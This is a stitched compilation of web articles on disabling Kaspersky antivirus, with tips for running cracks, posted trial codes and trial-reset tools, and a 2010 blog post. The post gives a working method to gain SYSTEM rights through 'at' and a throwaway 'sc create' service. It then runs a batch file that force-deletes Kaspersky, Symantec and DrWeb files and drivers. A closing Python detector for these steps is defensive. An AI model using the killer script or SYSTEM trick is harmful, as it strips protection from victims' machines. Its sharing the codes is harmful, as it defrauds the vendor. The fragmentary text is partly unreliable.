
In certain situations, it becomes necessary to disable Kaspersky, for example when you need to open a certain page but the program identifies it as potentially dangerous or malicious. Also, many people know that antiviruses quarantine all kinds of cracks and programs for hacking software licenses. In this case, there is no other option but to disable Kaspersky self-defense while working with such utilities.
Before disabling Kaspersky, please note that after this the antivirus becomes inactive, that is, your system is completely unprotected against all kinds of malware and viruses. Thus, you expose yourself to potential danger.

You will need:

In order to disable Kaspersky version 2010, you will need to open the main antivirus window (you can do this by double-clicking on the program shortcut in the taskbar, using the shortcut on the desktop, or by finding Kaspersky Anti-Virus among installed programs in the Start menu).

After that, look for the “Settings” button in the upper right of the window. A settings window will appear, and in its left working area the “Settings” section will be available. Go into it and uncheck the box next to the line “Enable self-defense”. Confirm the changes by clicking the “OK” button and close the settings menu. It's easier than using Kaspersky Rescue Disk.

In the case of the 2011 version, the procedure will be similar. Just like in the previous case, open the settings window (it is located in the same place). After that, go to the “Self-Defense” tab. We look at the window, which is located on the right side: there we look for the “Enable self-defense” option.

In order to disable Kaspersky 2011, uncheck the box next to this item and save the changes using the “OK” button. After completion, be sure to enable self-defense. If necessary, activate the program or extend the trial version of Kaspersky.

Cautions

As we have already said, by disabling the antivirus self-defense you will not be able to scan your computer for viruses, and you expose it to potential danger. So only do this if absolutely necessary, and only if you are one hundred percent sure that the link you want to follow is completely safe and that the program you are about to run or install will not harm your operating system.

Remember that preventing the penetration of malicious software is much easier than later dealing with the consequences of their activity.

As you know, Kaspersky Anti-Virus self-defense is a component that protects the antivirus itself from malicious software that tries to harm the operation of the antivirus program or remove it from your computer. Disabling self-defense is quite simple: it is done from the settings menu. However, it is not always possible to do this. In this article we will find out what to do if Kaspersky self-defense does not turn off and how to fix it.

How to disable Kaspersky self-defense

Under normal conditions, Kaspersky self-defense is disabled in the menu Settings > Additionally > Self-defense. To get to the settings, click the gear icon in the lower left corner of the main program window.

Then click Self-defense and uncheck the box labeled Enable self-defense.

Kaspersky self-defense is not active

Once the license to use Kaspersky expires, its operation is suspended and most functions are blocked. Among these functions is Self-Defense. To restore the operation of the protection components, you must activate Kaspersky using a new license or use the following solution to the problem.

1. Uninstall Kaspersky using the Kaspersky Lab product removal utility KAVRemover. Run the utility and agree to the license terms. Select the version of Kaspersky that you want to remove, enter the captcha code in the appropriate field and click Delete .

After removal, the system will prompt you to restart your computer - refuse to reboot. We'll do this later.

HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab

Delete it: right-click the key and select Delete.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\SPC

delete.

4. Restart your computer.

5. After the system starts, install an antivirus. If you do not have an activation file, you can use the 30-day version of the product. After activation, all components will become available.

01.08.2019


Many users need to disable Kaspersky Anti-Virus for a while. There can be a great many reasons for implementing this procedure: false positives, installation of pirated software and games, software conflicts, launching another antivirus program, etc.

However, not everyone knows how to correctly disable Kaspersky for a while.

In this article we will talk in detail about the possible ways of disabling this antivirus program.

Temporary deactivation

To temporarily disable your antivirus:

1. Place the cursor over the Kaspersky icon in the tray (the right part of the taskbar).

2. Click the right mouse button.

3. In the context menu, click “Pause protection...”.

4. Select suspend mode:

“... for a specified time” - disable Kaspersky for the period of time specified in the drop-down list. Click “1 minute” in the first item and select the desired value (3 minutes, 5 minutes .... 3 hours, 5 hours).

“... before restarting the program” - the antivirus is activated only after a restart;

“suspend” - deactivation for an indefinite period: Kaspersky will be disabled until the user turns it on again.

5. After selecting the mode, click the “Pause protection” button.

6. Confirm the action: in the “Attention!” window, click “Continue”.

Note. In the confirmation request, you can set whether the request will be repeated in the next 30 minutes. To do this, click to set the check mark in the additional window.

7. After pausing, the message “Protection is not working” will appear. The antivirus tray icon will display an exclamation point symbol (a warning that the security software is disabled).

Other ways to disconnect

You can use other options for deactivating the Kaspersky anti-virus program.

Method #1

1. Click on the program icon in the tray. In the menu, click "Settings".

2. On the “General” tab, in the “Protection” column, by clicking the mouse, change the position of the slider to “Off.”

Attention! Here, on the “General” tab, you can also disable the automatic start of the antivirus when you turn on the computer.

Method #2

You can also completely unload the security software from memory - close the program.

1. Open the tray menu and select "Exit".

2. Confirm closing the application: in the request panel, click “Continue”.

After activating the exit, the tray icon will disappear. To start the antivirus again, you need to use its directory in the Start menu.

Disabling self-defense

If you need to disable Kaspersky self-defense - a special software mechanism that prevents modifications of antivirus elements - follow these instructions:

1. Go to the program settings and click the “Advanced” tab.

2. Select “Self-Defense” from the list on the right.

3. Click the mouse to remove the check mark in the “Enable self-defense” line.

4. Confirm the request: click “Continue”.

Be careful when disabling Kaspersky Anti-Virus! During the period of its deactivation, your PC has no protection and may be susceptible to all kinds of virus attacks. After completing the necessary procedures, be sure to reactivate the security software. If you constantly need to disable the antivirus when launching a specific application or loading a specific website, it is more advisable to add them to the exceptions rather than resort to temporary deactivation.


If you are reading this article, then you are probably asking yourself how to disable Kaspersky self-defense when your license has expired and the self-defense menu item is not active, i.e. nothing about it can be changed. This article will help you disable self-defense in order to make and receive a new key.

How to disable self-defense if you don't have a license

To begin with, there are two ways to do this: one is to remove Kaspersky Anti-Virus, and the second is to boot Windows in safe mode. In fact, both methods ultimately give the same result. I’ll start with the method that is more accessible to ordinary users: uninstalling the program.


2. Let's launch this program and agree to the license agreement.


After removing Kaspersky, click OK and restart the computer.

In the line that appears, enter the command regedit and click OK.



Before us is the Windows registry editor. Here you need to delete some keys (folders). They are located at:

HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\SPC

That is, navigate the editor as you would Explorer and delete the KasperskyLab and SPC “folders” at the addresses above: right-click each of them and select "Delete".

4. After deleting these keys, close the registry editor, download the desired Kaspersky product (Kaspersky Total Security or Kaspersky Internet Security) from the official Kaspersky website, install it and launch it. The program then asks you to enter a license key or get a trial version, in which case the self-defense tab becomes active again and can be turned off.

The second way to disable self-defense if you don’t have a license

It consists of rebooting the computer into safe mode and, already in safe mode, performing the same operations starting from paragraph 3 of this instruction. That is, you won’t need to uninstall Kaspersky before going into the registry: boot in safe mode, delete the same keys in the registry and reboot in normal mode, after which access to the blocked self-defense is restored.


The video below clearly shows the process of disabling blocked self-defense, and you can visually evaluate these manipulations; in fact, everything is very simple.

In Kaspersky Anti-Virus you can pause protection, that is, disable the operation of all program components for a while, and also resume it.

Pausing application protection only means disabling protection components. Pausing protection does not affect the execution of scans and updates in Kaspersky Antivirus.

2. How to pause protection

You can select one of the following protection suspension modes:

  • - protection will be turned on after the specified time interval. Protection will be enabled before the set time if you restart the program or reboot the system:
    • If included
    • If turned off ).
  • - protection will be enabled after restarting the program or rebooting the system:
    • If automatic launch of the program is enabled, protection will be enabled automatically.
    • If automatic launch of the program is turned off, you must launch the program manually to enable protection (Start - All Programs - Kaspersky Anti-Virus).
  • Suspend - protection will be turned on only when you decide to resume protection.

Pause protection from the context menu

To pause computer protection from the program's context menu, follow these steps:

  1. In the Pause protection window, select one of the following:
    • Pause for a specified time
    • Suspend until reboot.
    • Suspend.

Pausing protection from Kaspersky Gadget

You can pause protection using the Kaspersky Gadget. For this, Kaspersky Gadget must be configured so that one of its buttons is assigned the Pause protection function.

To pause computer protection using Kaspersky Gadget, follow these steps:

  1. In the Pause protection window, select one of the following:
    • Pause for a specified time(in the field below, indicate the period of time after which protection will be resumed).
    • Suspend until reboot.
    • Suspend.


On this page you will find Kaspersky antivirus codes for 2013-2018, as well as utilities for resetting the trial period (retrials).

At the time of publication, all keys and codes are working (verified).

Codes for KIS and KAV 2013, 2014, 2015, 2016, 2017 and 2018


Official trial (trial) codes. Attention! Before activation, reset the trial period from using Kaspersky Reset Trial (look below). Otherwise it does not activate or activates for 30 days or less.

4CH4C-PPFDT-NFK4B-45R69- 90 days (KIS 2014 - 2018)
XZBB7-UZFBN-E8GAD-9GZUF- 60 days (KIS 2013 – 2018)


JHJ7C-C69PX-MQY3J-PKG5B- for 90 days (KAV 2013-2018)
52MFR-XMPS3-RPXBM-K6T5E- for 90 days (KAV 2014-2018)

To activate, use a French proxy.
The proxy must be entered in Settings => Advanced => Network => Proxy server settings (at the very bottom).
After activation, disable the proxy.


JAPXZ-9G9EJ-CSUV2-7YQUS- 45 days

After 90 days, reset the trial period again and reactivate the antivirus for 90 days. And then again and again...

  1. License dumps
    There will be no more dumps. The keys are quickly banned and then the antivirus stops updating. Therefore, now the dump is of no use.
  2. Codes for a year or more
    There will be no free long codes either. Don't search on the Internet - you won't find workers. They will be banned quickly, even if they appear.
    • Now the most working option for KIS- this is activation using trial codes for 90 days, which are located above. When the trial period expires, reset the trial period and activate again. I think it’s not difficult to press a couple of buttons every 3 months.
    • For KAV There are journal keys, but they are of little use, because... most often they are given for 30 days. The easiest way is to reset the trial period every month. There is also a 90-day code at this time. Reset the trial period and activate. Everything is like with KIS.
    • The same goes for KTS- The easiest way is to reset the trial period every month. Sometimes there are promotions for the distribution of keys for an average of 3 months.
  3. What's the result?
    Freebies as before (keys for 1-3 years, dumps for a year or more, purchased codes) will probably not appear any more. In recent years, Kaspersky has done a great job of combating this. They often monitor sites where keys are distributed in order to ban them immediately. Everything you find on the Internet is mostly either not working or some kind of deception.

Trial Reset for Kaspersky(Retrial - trial period reset):

Kaspersky Reset Trial

Kaspersky Reset Trial - great tool to reset the trial period and activate using a Kaspersky antivirus dump.

Kaspersky Antivirus 2012
Kaspersky Antivirus 2013
Kaspersky Antivirus 2014
Kaspersky Antivirus 2015
Kaspersky Antivirus 2016
Kaspersky Antivirus 2017
Kaspersky Antivirus 2018

Kaspersky Internet Security 2012
Kaspersky Internet Security 2013
Kaspersky Internet Security 2014
Kaspersky Internet Security 2015
Kaspersky Internet Security 2016
Kaspersky Internet Security 2017
Kaspersky Internet Security 2018

Kaspersky Total Security 2015
Kaspersky Total Security 2016
Kaspersky Total Security 2017
Kaspersky Total Security 2018

Kaspersky Free Antivirus 2016
Kaspersky Free Antivirus 2017
Kaspersky Free Antivirus 2018

Kaspersky PURE 2.0
Kaspersky PURE 3.0

Kaspersky Endpoint Security 8
Kaspersky Endpoint Security 10

Kaspersky Small Office Security 2
Kaspersky Small Office Security 3
Kaspersky Small Office Security 4
Kaspersky Small Office Security 5

Download Kaspersky Reset Trial 5.1 -

KasTrial

KasTrial- a utility for resetting the trial period of Kaspersky antiviruses.

All features of KasTrial:

  • Activating Kaspersky using a key
    Now you don’t need to enter the code for beta versions with the Internet turned off so that you can activate using the key.
  • Retrieving the key from Kaspersky
    You can display the key file and activation code from Kaspersky.
  • Ability to completely disable KSN
    Kaspersky Security Network (KSN) is a cloud-based antivirus technology. Now you can turn it off completely.
  • Removing trial reminders
    Removes a reminder about using a trial license and a request to buy a license.
Supported Products:
  • KIS/KAV 2010, 2011, 2012, 2013
  • Kaspersky Crystal (Pure) (before Crystal 2012)
  • KAV 6.0.4.1424 WKS MP4
  • Kaspersky Small Office Security 2 (for file servers and PC)
  • Kaspersky Endpoint Security 8


When using Kaspersky Anti-Virus, situations sometimes arise when protection needs to be turned off for a while. For example, you need to download some required file, but the antivirus system does not let it through. The program has a function that allows you to turn off the protection for 30 minutes using one button; after this time, the program will remind you of itself. This was done so that the user would not forget to enable protection, thereby exposing the system to danger.

Disable Kaspersky Anti-Virus

1. To temporarily disable Kaspersky Anti-Virus, open the program and find "Settings".

2. Go to the "General" tab. At the very top, move the protection slider to off. The antivirus is disabled.

You can check this in the main program window. When protection is turned off, the message "Protection off" is shown.

3. The same can be done by right-clicking the Kaspersky icon located on the bottom panel. Here you can pause protection for a certain period of time or permanently. You can also select the until-reboot option, in which case protection turns on after the computer is rebooted.

How to copy settings and self-defense of Kaspersky 2010

After configuring all Kaspersky Anti-Virus settings at your discretion, you can export or import them in order to reuse the settings template on other computers where a similar application is installed. For example, you can copy the antivirus settings from a home computer and, using the created template, quickly configure the application on your work computer or on other computers in your home network.

All parameters are saved as a special configuration file. To save the current antivirus settings as a template, export the application's parameters by performing the following sequence of actions. In the main application window, click "Settings", then in the window that opens, in the menu block on the left, select the "Options" section. In the central part of the window, go to the block " " and click the "Save" button. A "Selecting a configuration file" window will appear, in which you need to specify the name of the saved file and the folder in which it will be placed. The file is assigned the .cfg extension. Close the window by clicking "Save".

To later import antivirus parameters from a previously saved configuration file, click the "Settings" button in the main application window and, in the window that opens, select the "Options" section in the menu block on the left. In the "Managing program settings" block, click the "Download" button. In the window that appears, find the saved configuration file, then click "Open".

To protect the application's system files and settings from viruses that try to interfere with its operation, Kaspersky Anti-Virus includes a special self-defense function and protection against remote control. When the antivirus is used on Microsoft Windows Vista and on 64-bit operating systems, this function is limited to managing the application's self-defense mechanism against changing or deleting its own files on disk and its entries in the system registry.

To enable the antivirus self-defense function, click the "Settings" button in the main application window. In the window that appears, in the menu block on the left, select the "Options" section. In the "Self-defense" block, check the box "Enable self-defense".

If you want to block remote access to the management of antivirus functions and components, check the box "Disable the ability to externally control a system service" in the "Self-defense" block. In this case, if attempts to access the management of antivirus services are detected, a corresponding notification will appear above the application icon in the notification area of the taskbar.

July 6, 2010 at 01:28

Self-defense of antiviruses or cutting antivirus without a knife

  • Antivirus protection

Hi all!

We recently discussed the power of the heuristic technologies of modern antiviruses and came to the conclusion that you can’t trust anyone. Sometimes not even yourself :)

Today we will talk about another controversial issue of antiviruses: self-defense. Some vendors take this point very seriously, and their products survive even in complex cases of active infection, effectively removing virus hooks, installing themselves into the system, and even subsequently removing already well-established malware. Others believe that fighting an active infection is a battle with windmills that does not lead to anything worthwhile, and therefore recommend a LiveCD, and in some cases format c:

Let's give both sides their due: of course, if there is an opportunity to win the confrontation with the virus, that's good, unless this leads to BSODs and a system that takes a couple of days to load. And it is absolutely obvious that with a serious and complex infection it is often impossible to get through the active mass of hooks, malicious kernel-level processes and other things, and therefore it is often wiser to treat an inactive system (from a LiveCD or by scanning the hard drive on an uninfected machine), and, in the case of a motley file infection, to think about completely reinstalling the OS.

But let’s not indulge in arguments; we’ll leave this for the next article :) Let’s talk about something simple: the self-defense of the system, even on a system that is known to be uninfected. And let's accept a priori:

1) there is a comprehensive antivirus+HIPS+firewall product;
2) the system was not infected, but malicious code somehow got into it;
3) the malicious code intends to remove the antivirus or damage it so much as to render it completely inoperable.

The course of action will be the simplest: an attempt to delete vital antivirus files with Local System rights. The idea for this approach belongs to my good friend Alexey Baranov, who reported on it in closed circles some time ago. Time has passed; let's assume that vendors have caught up, and check.

On Windows systems where the user works as an administrator (and this is probably 80% of all systems), obtaining Local System rights is quite simple. Two methods immediately come to mind, both well described on the Internet.

Method 1: Using a scheduler.
By default, the task scheduler service runs on all Windows systems. This service runs tasks with the required Local System rights. Then it’s very easy to add a task like this:
at 11:05 c:\killer.bat
and killer.bat will run with Local System rights.

The advantages are obvious: everything is simple and clear. Disadvantage: the user may notice a strange new task in the scheduler, and simply disable this service for security reasons.

Method 2: Create a service.
The essence of the method is to create a service, start it and delete it. In this case, everything is implemented in three lines:
sc create CmdAsSystem type= own type= interact binPath= "cmd /c start /low /b cmd /c (c:\killer.bat)"
net start CmdAsSystem
sc delete CmdAsSystem

Moreover, killer.bat will not only start with IDLE priority, it will also be launched on behalf of Local System.
The method is invisible and does not manifest itself in any way.

At the time of publication of the article, KIS 2010 allowed both methods to pass at the HIPS level, without even requesting any permissions.

Well, now let's get down to killer.bat itself (in our case it is located in the root of drive C, but it is clear that it can be placed anywhere).

The essence of this file is simple: we delete everything that belongs to the antivirus. So, for Kaspersky 2010 it will be:
net stop srservice
erase /F /S /Q "C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 2010"
erase /F /S /Q "%windir%\system32\drivers\kl1.sys"
erase /F /S /Q "%windir%\system32\drivers\klif.sys"
erase /F /S /Q "%windir%\system32\drivers\klbg.sys"
erase /F /S /Q "%windir%\system32\drivers\klim5.sys"
erase /F /S /Q "%windir%\system32\drivers\klmd.sys"
erase /F /S /Q "%windir%\system32\drivers\klmouflt.sys"

For Symantec, something like this (whoever knows more precisely, correct me; I’m on Kaspersky myself):
net stop srservice
erase /F /S /Q "C:\Program Files\Symantec"
erase /F /S /Q "C:\Program Files\Norton Internet Security"

For Doctor Web:
net stop srservice
erase /F /S /Q "C:\Program Files\DrWeb"
erase /F /S /Q "%windir%\system32\drivers\dwprot.sys"
erase /F /S /Q "%windir%\system32\drivers\drwebaf.sys"
erase /F /S /Q "%windir%\system32\drivers\DrWebPF.sys"
erase /F /S /Q "%windir%\system32\drivers\spiderg3.sys"
shutdown -r -f -c "Bye-Bye!!!"

It is clear that a similar script can be written for all antiviruses - the point is to change the paths to vital files.

So, what do we have?

1. KIS 2010 received such damage that it was killed, and the system was left without protection. KIS 2011 is devoid of this sexual weakness - but it’s still a beta...
2. NIS lost several files, but the functionality was not affected; the files were subsequently downloaded and restored when updating from the Internet.
3. DrWeb was not affected at all, which was expected, taking into account the developer’s special emphasis on counteracting the infection. But don’t forget that there is SpiDie for the Web...

At the same time, the HIPS of these products calmly let both variants of the manipulation through (CIS checked it personally).

CONCLUSIONS
Unfortunately, we have to admit that some of the existing antivirus solutions have a number of vulnerabilities that can be used to damage the protection and actually remove the antivirus from the computer.

Readers are invited to add, in the comments, observations and research on other antivirus products (preferably with HIPS, in order to evaluate how well actions to obtain Local System rights are blocked). I think the described manipulations are understandable and can easily be reproduced by enthusiasts on virtual machines.
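A defender's view of the two launch methods and the deletion step described above, as an added example that is not part of the original article: a small detector that flags a service whose binPath starts a shell, a service created and deleted within minutes, an `at` job, and deletion of files in the protected locations the article lists. The event format, rule names and sample records are assumptions constructed for illustration; in practice the records would come from process-creation and file-delete auditing.

```python
import re
from datetime import datetime, timedelta

# Protected locations, taken from the paths listed in the article above;
# extend the vendor list for the products actually deployed.
PROTECTED = re.compile(
    r"\\program files( \(x86\))?\\"
    r"(kaspersky lab|symantec|norton internet security|drweb)(\\|$)"
    r"|\\system32\\drivers\\[^\\]+\.sys$",
    re.I,
)
SC_CREATE = re.compile(
    r"^\s*sc(\.exe)?\s+create\s+(?P<name>\S+)\s.*?binpath=\s*(?P<bin>.+)$", re.I)
SC_DELETE = re.compile(r"^\s*sc(\.exe)?\s+delete\s+(?P<name>\S+)", re.I)
AT_JOB = re.compile(r"^\s*at(\.exe)?\s+\d{1,2}:\d{2}\s+\S", re.I)
SHELL = re.compile(r"\bcmd(\.exe)?\b|\.(bat|cmd)\b", re.I)


def detect(events, window=timedelta(minutes=5)):
    """Return (rule, time, detail) alerts for a time-ordered list of events.

    Each event is a dict (hypothetical format): process events carry
    "cmdline", file-delete events carry "path"; both carry "kind" and "time".
    """
    alerts = []
    created = {}        # service name -> time it was created
    last_launch = None  # time of the most recent SYSTEM-launch indicator
    for ev in events:
        when = datetime.fromisoformat(ev["time"])
        if ev["kind"] == "file_delete":
            if PROTECTED.search(ev["path"]):
                rule = "security_product_file_deleted"
                # Escalate when the deletion closely follows a launch indicator.
                if last_launch is not None and when - last_launch <= window:
                    rule = "tamper_after_system_launch"
                alerts.append((rule, ev["time"], ev["path"]))
            continue
        cmd = ev["cmdline"]
        m = SC_CREATE.match(cmd)
        if m:
            created[m.group("name").lower()] = when
            # A service whose binary is a shell or a script is rarely legitimate.
            if SHELL.search(m.group("bin")):
                alerts.append(("service_runs_shell", ev["time"], m.group("name")))
                last_launch = when
        m = SC_DELETE.match(cmd)
        if m:
            born = created.pop(m.group("name").lower(), None)
            if born is not None and when - born <= window:
                alerts.append(("short_lived_service", ev["time"], m.group("name")))
        if AT_JOB.match(cmd):
            alerts.append(("at_job_scheduled", ev["time"], cmd))
            last_launch = when
    return alerts


# Constructed sample records (timestamps invented; command lines and the
# driver path follow the article's text, the first and last rows are benign).
SAMPLE_EVENTS = [
    {"kind": "process", "time": "2024-01-01T11:00:01",
     "cmdline": 'sc create BackupAgent binPath= "C:\\Program Files\\Backup\\agent.exe" start= auto'},
    {"kind": "process", "time": "2024-01-01T11:03:10",
     "cmdline": "at 11:05 c:\\killer.bat"},
    {"kind": "process", "time": "2024-01-01T11:04:00",
     "cmdline": 'sc create CmdAsSystem type= own type= interact '
                'binPath= "cmd /c start /low /b cmd /c (c:\\killer.bat)"'},
    {"kind": "process", "time": "2024-01-01T11:04:01",
     "cmdline": "net start CmdAsSystem"},
    {"kind": "process", "time": "2024-01-01T11:04:02",
     "cmdline": "sc delete CmdAsSystem"},
    {"kind": "file_delete", "time": "2024-01-01T11:04:03",
     "path": "C:\\Windows\\system32\\drivers\\klif.sys"},
    {"kind": "file_delete", "time": "2024-01-01T11:04:04",
     "path": "C:\\Users\\admin\\AppData\\Local\\Temp\\setup.log"},
]

if __name__ == "__main__":
    for rule, time, detail in detect(SAMPLE_EVENTS):
        print(f"{time}  {rule:30}  {detail}")
```

File deletions are modelled as separate events because `erase` is a cmd.exe built-in and produces no process-creation record of its own.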
